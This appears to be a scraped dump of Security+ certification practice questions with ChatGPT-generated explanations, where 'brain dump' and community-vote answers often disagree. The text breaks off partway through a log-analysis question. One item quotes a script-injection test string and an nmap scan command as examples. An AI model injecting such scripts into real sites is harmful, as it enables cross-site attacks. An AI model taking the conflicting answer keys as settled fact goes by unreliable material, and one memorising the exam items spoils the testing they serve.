A. Auto-update, D. Third-party updates

(Braindump : A. Auto-update F. Sandboxing)
(Community : AF 43%, BC 32%, AD 22%)

(ChatGPT)
A. Auto-update
D. Third-party updates
Explanation:

Auto-update: Ensuring that software and applications are automatically updated helps to quickly apply patches and fixes for newly discovered vulnerabilities. This reduces the window of opportunity for attackers to exploit known vulnerabilities.

Third-party updates: Keeping third-party software and libraries updated is crucial because vulnerabilities in these components can be exploited. Regularly updating third-party components ensures that any known security issues are addressed.

Rationale for Other Options:

HTTP headers: Implementing secure HTTP headers can help protect against specific web vulnerabilities (e.g., XSS, clickjacking), but it is more of a second step after ensuring the software is up-to-date.

Secure cookies: This helps to secure web applications by ensuring cookies are transmitted securely, but again, it is a more specific measure.

Full disk encryption: This protects data at rest, which is important but does not directly reduce application vulnerabilities.

Sandboxing: This helps to isolate applications and reduce the impact of a compromised application, but it is a more advanced and specific measure.

Hardware encryption: This is more relevant to securing data at rest and protecting against physical access attacks, rather than directly reducing application vulnerabilities.
597
Q

Which of the following authentication methods is considered to be the LEAST secure?

A. TOTP
B. SMS
C. HOTP
D. Token key

A

B. SMS

Here’s why:

SMS (Short Message Service): SMS-based authentication is susceptible to various attacks, including SIM swapping, interception of messages, and phishing attacks. Attackers can redirect SMS messages to their own devices or intercept them, thereby compromising the authentication process. Due to these vulnerabilities, SMS is generally considered the least secure method among the options listed.

Let’s briefly review the other options for clarity:

A. TOTP (Time-based One-Time Password): TOTP generates a time-based one-time password that is typically valid for a short period (e.g., 30 seconds). It is more secure than SMS because it relies on a shared secret and time synchronization, making it less vulnerable to interception and SIM swapping.

C. HOTP (HMAC-based One-Time Password): HOTP generates a one-time password based on a counter and a shared secret. Like TOTP, it is more secure than SMS because it does not rely on the SMS network and is not vulnerable to SIM swapping or message interception.

D. Token key: Token keys (hardware or software tokens) generate one-time passwords or other authentication codes independently of the network. They are considered more secure than SMS because they are not susceptible to network-based attacks like interception or SIM swapping.

Therefore, B. SMS is the least secure authentication method among the options provided.

598
Q

Employees in the research and development business unit receive extensive training to ensure they understand how to best protect company data. Which of the following is the type of data these employees are most likely to use in day to-day work activities?

A. Encrypted
B. Intellectual property
C. Critical
D. Data in transit

A

B. Intellectual property

Here’s why:

Encrypted Data: While encryption is a method of securing data, it is not a type of data itself. R&D employees might work with encrypted data, but the focus here is on the nature of the data, not its state of security.

Intellectual Property: This includes patents, trade secrets, proprietary designs, and formulas. R&D departments are heavily involved in creating and working with intellectual property, as it is the core of innovation and development within a company.

Critical Data: This is data that is essential to the functioning of the company. While R&D might handle critical data, it is a broader term that can apply to many departments, not specifically to the nature of their daily work.

Data in Transit: This refers to data that is being transferred from one location to another. Similar to encrypted data, this is about the state of the data rather than its type.

Thus, Intellectual Property is the most accurate answer, as it directly relates to the nature of the work performed by R&D employees.

599
Q

An audit report indicates multiple suspicious attempts to access company resources were made. These attempts were not detected by the company. Which of the following would be the best solution to implement on the company’s network?

A. Intrusion prevention system
B. Proxy server
C. Jump server
D. Security zones

A

A. Intrusion prevention system (IPS)

Here’s why:

Intrusion Prevention System (IPS): An IPS monitors network traffic for suspicious activities and known threats, and can take action to prevent these threats from succeeding. This system is designed to detect and prevent unauthorized access attempts in real time, which addresses the issue highlighted in the audit report.

Proxy Server: A proxy server primarily acts as an intermediary for requests from clients seeking resources from other servers. While it can provide some security benefits, such as hiding internal IP addresses and blocking access to certain websites, it is not specifically designed to detect or prevent unauthorized access attempts.

Jump Server: A jump server is used to manage access to other servers within a network, often used to improve security by providing a single point of access control. However, it does not actively monitor or prevent suspicious access attempts across the entire network.

Security Zones: Implementing security zones involves segmenting the network into different areas based on security needs. While this can enhance security by isolating critical resources, it is not a direct solution for detecting and preventing unauthorized access attempts.

Therefore, implementing an Intrusion Prevention System (IPS) would be the most effective solution to address the issue of undetected suspicious access attempts.

600
Q

An administrator identifies some locations on the third floor of the building that have a poor wireless signal. Multiple users confirm the incident and report it is not an isolated event. Which of the following should the administrator use to find the areas with a poor or non-existent wireless signal?

A. Heat map
B. Input validation
C. Site survey
D. Embedded systems

A

C. Site survey

Here’s why:

Heat Map: A heat map is a visual representation of the wireless signal strength in different areas, often created as part of a site survey. It shows the areas with strong and weak signals. However, the process of creating a heat map involves conducting a site survey.

Input Validation: Input validation is a technique used in software development to ensure that input data is correct and useful. It is not relevant to diagnosing wireless signal strength issues.

Site Survey: A site survey involves assessing and mapping the wireless coverage within a building. It includes measuring signal strength at various locations to identify areas with poor or non-existent wireless coverage. This is precisely what is needed to address the reported issue.

Embedded Systems: Embedded systems are specialized computing systems that are part of larger devices, typically used for specific control functions. They are not related to identifying wireless signal issues.

Therefore, conducting a Site Survey is the appropriate action for the administrator to take to find and address areas with poor wireless signal on the third floor.

601
Q

Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

A. Compensating control
B. Network segmentation
C. Transfer of risk
D. SNMP traps

A

A. Compensating control

Here’s why:

Compensating Control: This is a security measure that is implemented to satisfy the requirements of a security policy that cannot be met with the primary control. In this case, allowing connections only from specific internal IP addresses serves as a compensating control to enhance security on a legacy system that may not support more modern security measures.

Network Segmentation: This involves dividing a network into smaller segments or subnetworks to improve security and manageability. While controlling access based on IP addresses can be part of network segmentation, the described scenario is specifically about a host-based firewall, not the overall network architecture.

Transfer of Risk: This refers to shifting the risk to another party, often through insurance or outsourcing. Implementing a host-based firewall rule does not transfer risk; it mitigates risk.

SNMP Traps: Simple Network Management Protocol (SNMP) traps are notifications sent from a network device to a management system, indicating a significant event. They are not related to firewall rules or access control.

Therefore, the implementation of specific internal IP address allowances in a host-based firewall on a legacy Linux system is best described as a Compensating Control.

(Brain dump: B. Network segmentation )

602
Q

An attacker tricks a user into providing confidential information. Which of the following describes this form of malicious reconnaissance?

A. Phishing
B. Social engineering
C. Typosquatting
D. Smishing

A

B. Social engineering

Here’s why:

Phishing: Phishing is a specific type of social engineering attack where the attacker sends fraudulent emails or messages that appear to come from a legitimate source, with the aim of tricking the user into providing confidential information. While phishing is a subset of social engineering, the broader term is more applicable to the general act of tricking users.

Social Engineering: This encompasses a wide range of manipulative tactics used to deceive individuals into divulging confidential information. It can include phishing, pretexting, baiting, and other methods where the attacker exploits human psychology.

Typosquatting: Typosquatting involves registering domain names that are similar to legitimate websites, often relying on common typing errors made by users. It aims to deceive users into visiting the malicious website but does not directly involve tricking users into providing information through direct interaction.

Smishing: Smishing is a form of phishing that involves sending fraudulent SMS (text) messages to trick users into providing confidential information. It is a specific type of social engineering attack using SMS.

Given that the question refers to the broader concept of tricking a user into providing confidential information, Social Engineering is the most accurate answer.

603
Q

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional under-voltage events that could last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the best solution to reduce the risk of data loss?

A. Dual supply
B. Generator
C. PDU
D. Daily backups

A

B. Generator

Here’s why:

Dual Supply: Having a dual power supply ensures redundancy in the power source, but if both sources are affected by the same power disruptions or intentional under-voltage events, this solution alone may not be sufficient.

Generator: A generator can provide a reliable backup power source during extended power outages or intentional under-voltage events. This ensures that critical systems can continue to operate for longer periods, thereby reducing the risk of data loss.

PDU (Power Distribution Unit): While a PDU helps in distributing power to multiple devices efficiently, it does not address the issue of power outages or under-voltage events.

Daily Backups: While daily backups are essential for data recovery and minimizing data loss, they do not prevent disruptions in real-time operations or data loss that can occur between backups during extended power outages.

Given the scenario with frequent brief outages and the high risk of longer intentional under-voltage events, implementing a Generator would provide continuous power during these disruptions, thereby ensuring the operation of data centers and reducing the risk of data loss.

604
Q

Which of the following examples would be best mitigated by input sanitization?

A.

alert("Warning!");

B. nmap -p- 10.11.1.130
C. Email message: “Click this link to get your free gift card.”
D. Browser message: “Your connection is not private.”
A

A.

alert("Warning!");

Here’s why:

<script>alert("Warning!");</script>: This is an example of a Cross-Site Scripting (XSS) attack, where malicious scripts are injected into web pages viewed by other users. Input sanitization can effectively prevent such attacks by ensuring that any user-provided input is properly encoded and does not contain executable code.

nmap -p- 10.11.1.130: This is a command used for network scanning. While it represents a potential security risk, it is more related to network security and should be mitigated through network access controls and monitoring rather than input sanitization.

Email message: "Click this link to get your free gift card.": This example represents a phishing attack. Mitigating phishing typically involves user education, email filtering, and anti-phishing technologies rather than input sanitization.

Browser message: "Your connection is not private.": This message indicates a potential issue with an SSL/TLS certificate or a man-in-the-middle attack. Addressing this issue involves ensuring proper SSL/TLS configurations and certificate management, not input sanitization.

Therefore, input sanitization is most directly applicable to mitigating the risks associated with the

alert("Warning!");
example.
605
Q

An organization would like to store customer data on a separate part of the network that is not accessible to users on the mam corporate network. Which of the following should the administrator use to accomplish this goal?

A. Segmentation
B. Isolation
C. Patching
D. Encryption

A

A. Segmentation

Here’s why:

Segmentation: Network segmentation involves dividing a network into smaller, distinct subnetworks or segments. By doing this, an administrator can isolate customer data on a separate network segment that is not accessible from the main corporate network, thereby enhancing security and reducing the risk of unauthorized access.

Isolation: While similar to segmentation, isolation typically refers to completely separating systems to ensure they have no connectivity. While effective, it is often more extreme and less flexible than segmentation, which allows for controlled and secure interactions between segments if needed.

Patching: Patching involves updating software to fix vulnerabilities and improve security. While important for maintaining the security of systems, patching does not address the specific need to separate and restrict access to customer data within the network.

Encryption: Encryption protects data by making it unreadable to unauthorized users. While crucial for data security, especially for data at rest and in transit, it does not solve the issue of network access control and separation of data storage.

Therefore, Segmentation is the best approach to achieve the goal of storing customer data on a separate part of the network that is not accessible to users on the main corporate network.

(Brain dump : B. Isolation)

606
Q

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

A. Cross-site scripting
B. Buffer overflow
C. Jailbreaking
D. Side loading

A

The company is addressing the following vulnerability by adding a clause to its Acceptable Use Policy (AUP) that states employees are not allowed to modify the operating system on mobile devices:

C. Jailbreaking

Here’s why:

Cross-site scripting (XSS): This vulnerability involves injecting malicious scripts into web pages viewed by other users. It is not directly related to modifying the operating system on mobile devices.

Buffer overflow: This vulnerability occurs when more data is written to a buffer than it can hold, potentially leading to arbitrary code execution. While serious, it is not specifically addressed by prohibiting modifications to the operating system on mobile devices.

Jailbreaking: Jailbreaking is the process of removing restrictions imposed by the operating system on mobile devices, typically to allow the installation of unauthorized applications or modifications. Prohibiting modifications to the operating system directly addresses the risk of jailbreaking, which can expose devices to security vulnerabilities and malicious software.

Side loading: Side loading refers to installing applications on a device from unofficial sources outside of the official app store. While related to security, it is not directly about modifying the operating system itself, but rather about how applications are installed.

Therefore, the organization is addressing the vulnerability of Jailbreaking by adding this clause to its AUP.

607
Q

A company is expanding its threat surface program and allowing individuals to security test the company’s internet-facing application. The company will compensate researchers based on the vulnerabilities discovered.
Which of the following best describes the program the company is setting up?

A. Open-source intelligence
B. Bug bounty
C. Red team
D. Penetration testing

A

B. Bug bounty

Here’s why:

Open-source intelligence (OSINT): OSINT involves collecting and analyzing publicly available information to identify potential security threats. It does not typically involve compensating individuals for discovering specific vulnerabilities in an application.

Bug bounty: A bug bounty program invites individuals, often external security researchers, to test the company's applications for vulnerabilities. The company compensates these researchers based on the vulnerabilities they discover and report. This description matches the scenario provided.

Red team: A red team consists of security professionals who simulate real-world attacks to test the defenses of an organization. While red teaming is a comprehensive security testing approach, it is usually conducted by an internal or contracted team rather than through an open program with external participants.

Penetration testing: Penetration testing involves authorized, simulated attacks on a system to identify security weaknesses. Penetration tests are typically conducted by hired security professionals or specialized firms, not through an open call to external researchers with compensation based on discovered vulnerabilities.

Therefore, the program described in the scenario is a Bug bounty program.

608
Q

An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Choose two.)

A. Application
B. Authentication
C. Error
D. Network
E. Firewall
F. System

A

(Community DE 63%, DF 19%, BD 19%)

Network logs (Option D): These logs can help identify network connections to the command-and-control server and provide information about source IP addresses (the impacted host) and destination IP addresses (the command-and-control server).

Firewall logs (Option E): Firewall logs also track network traffic and can provide valuable information about source and destination IP addresses, helping identify the impacted host and its communication with the command-and-control server.

Chat GPT :
D. Network
E. Firewall

Here’s why:

Network Logs: These logs contain information about network traffic, including connections made to and from internal and external IP addresses. Analyzing network logs can help identify communications between the impacted host and the command-and-control server.

Firewall Logs: Firewall logs record allowed and blocked network traffic. These logs can provide insights into unauthorized or suspicious connections to external IP addresses associated with the C2 server, helping to pinpoint the affected host.

The other options are less relevant in this context:

Application Logs: These logs track events related to specific applications, which might not directly reveal communication with a C2 server unless the application itself is compromised.

Authentication Logs: These logs track login attempts and authentication events. While useful for identifying unauthorized access, they are less likely to directly reveal communication with a C2 server.

Error Logs: These logs capture errors and warnings generated by various systems and applications. They are not typically focused on network activity or communications.

System Logs: These logs include a variety of system-level events and operations. While they can be useful for understanding overall system activity, they are less likely to directly indicate communications with a C2 server compared to network and firewall logs.

Therefore, Network and Firewall logs are the most relevant for identifying the impacted host in a command-and-control server incident.

609
Q

An administrator assists the legal and compliance team with ensuring information about customer transactions is archived for the proper time period. Which of the following data policies is the administrator carrying out?

A. Compromise
B. Retention
C. Analysis
D. Transfer
E. Inventory

A

B. Retention

Here’s why:

Compromise: This term generally refers to a security incident where data has been accessed or altered without authorization. It is not related to archiving information for a specific time period.

Retention: Data retention policies define how long different types of data should be kept before being deleted or archived. Ensuring that customer transaction information is archived for the proper time period is directly related to data retention.

Analysis: Data analysis involves examining data to extract useful information and insights. This does not involve archiving data for specific time periods.

Transfer: Data transfer policies govern the movement of data between locations or systems. This is not directly related to the archiving of data for compliance purposes.

Inventory: Data inventory involves keeping a catalog of all data assets within an organization. While important for understanding what data exists, it does not address how long data should be kept or archived.

Therefore, the administrator is carrying out a Retention policy by ensuring information about customer transactions is archived for the proper time period.

610
Q

Which of the following are the MOST likely vectors for the unauthorized or unintentional inclusion of vulnerable code in a software company’s final software releases? (Choose two.)

A. Unsecure protocols
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software

A

D. Included third-party libraries
E. Vendors/supply chain

Here’s why:

Unsecure protocols: While using insecure protocols can lead to vulnerabilities, they are not typically vectors for the inclusion of vulnerable code in software releases themselves. They are more related to communication security.

Use of penetration-testing utilities: These tools are used to test for vulnerabilities, not introduce them. While improper use could expose vulnerabilities, they are not a primary vector for including vulnerable code in final software releases.

Weak passwords: Weak passwords are a security risk for unauthorized access but are not directly related to the inclusion of vulnerable code in software releases.

Included third-party libraries: Using third-party libraries is a common practice in software development. However, these libraries can contain vulnerabilities or malicious code that can be unintentionally included in the final software release.

Vendors/supply chain: The software supply chain involves multiple vendors and sources that contribute to the final product. Vulnerabilities or malicious code can be introduced through these external entities, either intentionally or unintentionally.

Outdated anti-malware software: While having outdated anti-malware software can increase the risk of infection and attacks, it is not directly related to the inclusion of vulnerable code in software releases.

Therefore, the most likely vectors are Included third-party libraries and Vendors/supply chain.

611
Q

An organization has a growing workforce that is mostly driven by additions to the sales department. Each newly hired salesperson relies on a mobile device to conduct business. The Chief Information Officer (CIO) is wondering if the organization may need to scale down just as quickly as it scaled up. The CIO is also concerned about the organization’s security and customer privacy. Which of the following would be BEST to address the CIO’s concerns?

A. Disallow new hires from using mobile devices for six months.
B. Select four devices for the sales department to use in a CYOD model.
C. Implement BYOD for the sales department while leveraging the MDM.
D. Deploy mobile devices using the COPE methodology.

A

(Brain dump: C. Implement BYOD for the sales department while leveraging the MDM.)

(Community : C 78%, D 17%)
BYOD (Bring Your Own Device) allows employees to use their own mobile devices for work, which can reduce costs and increase productivity. MDM software can be used to manage and secure the devices, ensuring that they are compliant with policies and that sensitive data is protected.

(ChatGPT)
D. Deploy mobile devices using the COPE (Corporate-Owned, Personally-Enabled) methodology.

Here’s why COPE is a suitable choice:

COPE Methodology: COPE allows the organization to maintain control over the mobile devices while still enabling flexibility for employees to use them for both work and personal purposes. This model ensures that the devices are owned and managed by the organization, which enhances security and privacy controls.

Security and Privacy: With COPE, the organization can enforce security policies and configurations on the devices, ensuring they meet compliance requirements and protect customer data. This approach mitigates risks associated with using personal devices (BYOD) or random device selection (CYOD).

Scalability: COPE provides scalability because the organization can manage a fleet of corporate-owned devices more effectively as the workforce grows or shrinks. It allows for streamlined provisioning, management, and decommissioning of devices as needed.

Comparatively:

Disallowing new hires from using mobile devices for six months (Option A) may hinder productivity and isn’t scalable or sustainable in a modern business environment where mobility is essential.

Selecting four devices for the sales department in a Choose Your Own Device (CYOD) model (Option B) could limit flexibility and might not address security concerns as effectively as COPE.

Implementing Bring Your Own Device (BYOD) for the sales department (Option C) introduces more security risks due to the diversity of devices and potential lack of control over employee-owned devices, even with Mobile Device Management (MDM).

Therefore, deploying mobile devices using the COPE methodology is the best option to balance security, privacy, scalability, and flexibility for the growing sales department within the organization.

612
Q

A company has limited storage space available and an online presence that cannot be down for more than four hours. Which of the following backup methodologies should the company implement to allow for the FASTEST database restore time in the event of a failure, while being mindful of the limited available storage space?

A. Implement full tape backups every Sunday at 8:00 p.m. and perform nightly tape rotations.
B. Implement differential backups every Sunday at 8:00 p.m. and nightly incremental backups at 8:00 p.m.
C. Implement nightly full backups every Sunday at 8:00 p.m.
D. Implement full backups every Sunday at 8:00 p.m. and nightly differential backups at 8:00 p.m.

A

D. Implement full backups every Sunday at 8:00 p.m. and nightly differential backups at 8:00 p.m.

Here’s why this option is the most suitable:

Full Backups: Performing full backups every Sunday ensures that a complete copy of the database is captured weekly. This serves as a baseline for recovery operations.

Nightly Differential Backups: Differential backups capture all changes made since the last full backup. They are faster to perform and require less storage space compared to full backups. In the event of a failure, restoring from a full backup followed by the latest differential backup allows for faster recovery compared to incremental backups.

Fastest Restore Time: With this approach, the company can restore the database by first restoring the last full backup and then applying the latest differential backup. This minimizes the restore time because only the changes since the last full backup need to be applied.

Limited Storage Space: While full backups consume more storage space, performing them weekly and complementing them with nightly differentials strikes a balance between storage requirements and recovery speed. Incremental backups, as in option B, would require applying all incremental backups since the last full backup during a restore, potentially lengthening the restore time compared to differential backups.

Therefore, option D (full backups every Sunday and nightly differential backups) is the best choice for achieving the fastest database restore time while managing limited storage space effectively.

613
Q

A startup company is using multiple SaaS and IaaS platforms to stand up a corporate infrastructure and build out a customer-facing web application. Which of the following solutions would be BEST to provide security, manageability, and visibility into the platforms?

A. SIEM
B. DLP
C. CASB
D. SWG

A

C. CASB (Cloud Access Security Broker)

Here’s why CASB is the most appropriate choice:

Security: CASB solutions are specifically designed to provide security controls and policies for cloud applications and services. They enable the enforcement of security policies such as data encryption, access control, and threat protection across multiple cloud platforms.

Manageability: CASB solutions offer centralized visibility and management of cloud services. They provide insights into user activities, data usage patterns, and potential security threats across all integrated cloud platforms.

Visibility: CASB solutions enhance visibility by monitoring and auditing activities across SaaS and IaaS platforms. They provide detailed logs and reports that help identify compliance issues, anomalous behavior, and unauthorized access attempts.

Comparatively:

SIEM (Security Information and Event Management) solutions focus on aggregating and analyzing security event data from various sources across an organization's IT infrastructure. While valuable for overall security monitoring, they may not provide specific controls or visibility tailored for cloud applications and services.

DLP (Data Loss Prevention) solutions are crucial for protecting sensitive data by monitoring and preventing its unauthorized disclosure. While important, DLP primarily focuses on data protection rather than managing and securing cloud services.

SWG (Secure Web Gateway) solutions are used for controlling and securing web traffic, including enforcing security policies for web browsing and filtering malicious content. However, SWG solutions are not designed to provide comprehensive security and management capabilities for cloud applications and services.

Therefore, CASB would be the best solution to provide security, manageability, and visibility into the SaaS and IaaS platforms used by the startup company.

614
Q

Which of the following technical controls is BEST suited for the detection and prevention of buffer overflows on hosts?

A. DLP
B. HIDS
C. EDR
D. NIPS

A

(Community : C 82% , B 18%)
C. “…buffer overflows on hosts.” EDR is the Endpoint Detection and Response. HIDS can not prevent any buffer overflows.

ChatGPT
C. EDR (Endpoint Detection and Response)

Here’s why EDR is the most appropriate choice:

Endpoint Detection and Response (EDR): EDR solutions are designed to monitor and analyze endpoint activities in real time. They can detect suspicious behaviors, including those indicative of buffer overflow attacks, by monitoring system calls, process executions, and memory usage.

Buffer Overflows: Buffer overflows occur when a program writes data beyond the allocated buffer size, potentially leading to code execution or crashes that attackers can exploit. EDR solutions can detect abnormal memory usage patterns and unauthorized changes to memory segments, which are indicative of buffer overflow attempts.

Comparatively:

DLP (Data Loss Prevention) focuses on preventing the unauthorized transmission of sensitive data and is not specifically designed to detect or prevent buffer overflow attacks.

HIDS (Host-based Intrusion Detection System) can detect unauthorized access or changes to files, but it may not provide the detailed behavioral analysis needed to detect and prevent buffer overflows.

NIPS (Network Intrusion Prevention System) is oriented towards monitoring network traffic and preventing network-based attacks, such as DDoS or network-based exploits, rather than detecting and preventing buffer overflows on individual hosts.

Therefore, EDR is the best technical control suited for the detection and prevention of buffer overflows on hosts, due to its capabilities in real-time monitoring, behavioral analysis, and response to endpoint activities.

615
Q

A consultant is configuring a vulnerability scanner for a large, global organization in multiple countries. The consultant will be using a service account to scan systems with administrative privileges on a weekly basis, but there is a concern that hackers could gain access to the account and pivot throughout the global network.
Which of the following would be BEST to help mitigate this concern?

A. Create different accounts for each region, each configured with push MFA notifications.
B. Create one global administrator account and enforce Kerberos authentication.
C. Create different accounts for each region, limit their logon times, and alert on risky logins.
D. Create a guest account for each region, remember the last ten passwords, and block password reuse.

A

(Brain dump : C. Create different accounts for each region, limit their logon times, and alert on risky logins.)

Community : (C 70%, A 30%)
C - it’s a service account, can’t MFA

ChatGPT
A. Create different accounts for each region, each configured with push MFA notifications.

Here’s why this option is the most effective:

Multiple Accounts: By creating separate accounts for each region, the organization limits the scope of access. Compromising one account would not grant access to systems in other regions, thereby reducing the potential impact of a breach.

MFA (Multi-Factor Authentication) with Push Notifications: Enforcing MFA adds an additional layer of security beyond just a password. Push notifications enhance security by requiring a user to approve access attempts on their mobile device, reducing the risk of unauthorized access even if the account credentials are compromised.

Regional Segmentation: Limiting accounts to specific regions helps contain potential breaches and reduces the attack surface across the global network.

Comparatively:

Option B (Create one global administrator account and enforce Kerberos authentication) increases the risk because compromising this single global account would provide unrestricted access across all regions.

Option C (Create different accounts for each region, limit their logon times, and alert on risky logins) is better than having a single global account but does not explicitly address the need for multi-factor authentication, which is highly effective in preventing unauthorized access.

Option D (Create a guest account for each region, remember the last ten passwords, and block password reuse) focuses on password management rather than access control and does not address the need for separate accounts with regional segmentation and MFA.

Therefore, Option A (Create different accounts for each region, each configured with push MFA notifications) is the best choice to mitigate the concern of unauthorized access to the vulnerability scanner service account and potential pivoting throughout the global network.

616
Q

While troubleshooting a firewall configuration, a technician determines that a “deny any” policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable. Which of the following actions would prevent this issue?

A. Documenting the new policy in a change request and submitting the request to change management
B. Testing the policy in a non-production environment before enabling the policy in the production network
C. Disabling any intrusion prevention signatures on the “deny any” policy prior to enabling the new policy
D. Including an “allow any” policy above the “deny any” policy

A

B. Testing the policy in a non-production environment before enabling the policy in the production network.

Here’s why this option is the most appropriate:

Testing in Non-Production Environment: Before implementing any major changes, especially ones involving a "deny any" policy which blocks all traffic, it is crucial to test the changes in a controlled, non-production environment. This allows the technician to observe any unintended consequences, such as servers becoming unreachable, without impacting live services.

Change Management: While documenting the change request (Option A) and submitting it to change management are important steps for maintaining documentation and accountability, they do not directly prevent the immediate impact on production servers. Testing in a non-production environment provides an opportunity to identify and resolve issues before they affect live services.

Disabling Intrusion Prevention Signatures (Option C) is not relevant in this context as it pertains to a different security control and does not address the root cause of the servers becoming unreachable due to the "deny any" policy.

Including an "allow any" policy above the "deny any" policy (Option D) would negate the effect of the "deny any" policy and compromise security, as it would allow all traffic regardless of ACL rules.

Therefore, testing the policy in a non-production environment (Option B) is the most effective action to take to prevent the issue of servers becoming unreachable while troubleshooting firewall configurations. This approach ensures that changes are validated and any unintended consequences are addressed before applying them in a production network.

617
Q

A network technician is installing a guest wireless network at a coffee shop. When a customer purchases an item, the password for the wireless network is printed on the receipt so the customer can log in. Which of the following will the technician MOST likely configure to provide the highest level of security with the least amount of overhead?

A. WPA-EAP
B. WEP-TKIP
C. WPA-PSK
D. WPS-PIN

A

C. WPA-PSK (Wi-Fi Protected Access - Pre-Shared Key)

Here’s why WPA-PSK is the most suitable choice:

Ease of Configuration: WPA-PSK is straightforward to configure and manage. The same pre-shared key (password) is used for all clients accessing the guest wireless network, which aligns with the requirement of printing the password on receipts for customers.

Security: While WEP (Wired Equivalent Privacy) and WPS (Wi-Fi Protected Setup) are less secure and have known vulnerabilities, WPA-PSK provides stronger security through encryption and authentication mechanisms. It ensures that unauthorized users cannot easily access the network without the shared key.

Overhead: WPA-PSK does not require additional infrastructure or server-side configuration (unlike WPA-EAP, which involves a RADIUS server for authentication), making it a low-overhead solution suitable for a coffee shop environment.

Comparatively:

WPA-EAP (Wi-Fi Protected Access - Extensible Authentication Protocol) involves a more complex setup with a RADIUS server and provides individualized credentials for each user, which is more suitable for enterprise environments rather than a coffee shop setting.

WEP-TKIP (Wired Equivalent Privacy - Temporal Key Integrity Protocol) is an outdated protocol with significant security weaknesses and should not be used for securing modern wireless networks.

WPS-PIN (Wi-Fi Protected Setup - Personal Identification Number) is a simplified method for connecting devices to a wireless network but is also vulnerable to attacks and not suitable for providing the highest level of security.

Therefore, WPA-PSK is the best choice to provide a balance of security, ease of configuration, and minimal overhead for securing the guest wireless network at the coffee shop.

618
Q

Which of the following ISO standards is certified for privacy?

A. ISO 9001
B. ISO 27002
C. ISO 27701
D. ISO 31000

A

C. ISO 27701

Here’s why:

ISO 27701: This standard specifies requirements and provides guidance for establishing, implementing, maintaining, and continually improving a Privacy Information Management System (PIMS). It is an extension to ISO 27001 (Information Security Management System) and ISO 27002 (Code of practice for information security controls), focusing specifically on privacy management.

ISO 9001: This standard pertains to quality management systems and does not specifically address privacy management.

ISO 27002: This standard provides guidelines and best practices for information security controls, but it does not focus exclusively on privacy management.

ISO 31000: This standard provides principles and guidelines for risk management, applicable across various organizational contexts, but it does not specifically address privacy management.

Therefore, ISO 27701 is the ISO standard that is certified for privacy, as it specifically deals with Privacy Information Management Systems (PIMS) and extends the requirements of ISO 27001 to include privacy controls.

619
Q

An organization suffered an outage, and a critical system took 90 minutes to come back online. Though there was no data loss during the outage, the expectation was that the critical system would be available again within 60 minutes. Which of the following is the 60-minute expectation an example of?

A. MTBF
B. RPO
C. MTTR
D. RTO

A

D. RTO (Recovery Time Objective)

Here’s why:

Recovery Time Objective (RTO): RTO is the targeted duration within which a business process or system must be restored after a disruption (such as an outage or failure) in order to avoid unacceptable consequences. In this case, the organization expected the critical system to be back online within 60 minutes to meet business continuity requirements.

Mean Time Between Failures (MTBF): MTBF refers to the average time between failures of a system or component. It measures reliability rather than recovery time.

Recovery Point Objective (RPO): RPO specifies the maximum tolerable amount of data loss in time before a disruption. It focuses on data recovery rather than system recovery time.

Mean Time to Repair (MTTR): MTTR measures the average time taken to repair a failed component or system and restore it to normal operational status. It is related to the time spent repairing a system during an outage rather than the overall recovery time objective.

Therefore, RTO accurately describes the expectation of having the critical system back online within 60 minutes after the outage, aligning with business continuity and operational requirements.

620
Q

A security analyst needs to be proactive in understanding the types of attacks that could potentially target the company’s executives. Which of the following intelligence sources should the security analyst review?

A. Vulnerability feeds
B. Trusted automated exchange of indicator information
C. Structured threat information expression
D. Industry information-sharing and collaboration groups

A

D. Industry information-sharing and collaboration groups

Here’s why this option is the most appropriate:

Industry Information-Sharing and Collaboration Groups: These groups facilitate the exchange of threat intelligence and best practices among organizations within the same industry or sector. They often provide timely information about emerging threats, attack trends, and specific targeting tactics observed in the industry. This can help the security analyst stay informed about potential threats targeting executives and tailor defenses accordingly.

Comparatively:

Vulnerability Feeds (Option A) primarily provide information about software vulnerabilities and patches rather than specific threat intelligence related to targeted attacks on executives.

Trusted Automated Exchange of Indicator Information (Option B) refers to automated systems that share indicators of compromise (IOCs) and threat data between trusted entities. While useful for detecting known threats, it may not focus specifically on executive-level threats.

Structured Threat Information Expression (STIX) (Option C) is a standardized language for expressing threat information but does not in itself provide intelligence specific to executive-level attacks.

Therefore, industry information-sharing and collaboration groups are the most relevant intelligence sources for the security analyst to understand and mitigate potential threats targeting the company’s executives effectively.

621
Q

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications.
The firm has agreed to pay for each vulnerability that is discovered. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty
B. Black-box
C. Gray-box
D. White-box
E. Red-team

A

A. Bug bounty

Here’s why:

Bug Bounty: Bug bounty programs involve inviting external security researchers or firms to discover vulnerabilities in an organization's systems or applications. These researchers are typically incentivized by monetary rewards for each valid vulnerability they report. This approach encourages independent testing and discovery of vulnerabilities in a controlled and incentivized manner.

Penetration Testing Types Comparison:

    Black-box (Option B): This type involves testing where the tester has no prior knowledge of the network or systems being tested. Payment for vulnerabilities is not a defining characteristic of black-box testing.

    Gray-box (Option C): Gray-box testing involves partial knowledge of the internal workings of the systems being tested. Like black-box testing, it does not typically involve payment per vulnerability as part of the arrangement.

    White-box (Option D): White-box testing provides full knowledge of the systems, including internal architecture and source code. It is not typically associated with external firms paying for vulnerabilities but rather a comprehensive assessment by internal or contracted security teams.

    Red-team (Option E): Red-team exercises simulate realistic attacks to evaluate the effectiveness of security defenses. While they may involve external firms, they are not structured around payment per vulnerability discovered as in bug bounty programs.

Therefore, bug bounty best represents the type of testing where an outside security firm is hired to discover vulnerabilities and is paid for each vulnerability found during the testing process.

622
Q

A security analyst needs to determine how an attacker was able to use User3 to gain a foothold within a company’s network. The company’s lockout policy requires that an account be locked out for a minimum of 15 minutes after three unsuccessful attempts. While reviewing the log files, the analyst discovers the following:

3/16/20 3:31:10 AM Audit Failure : CompanyNetwork\User1 Unknown username or bad password
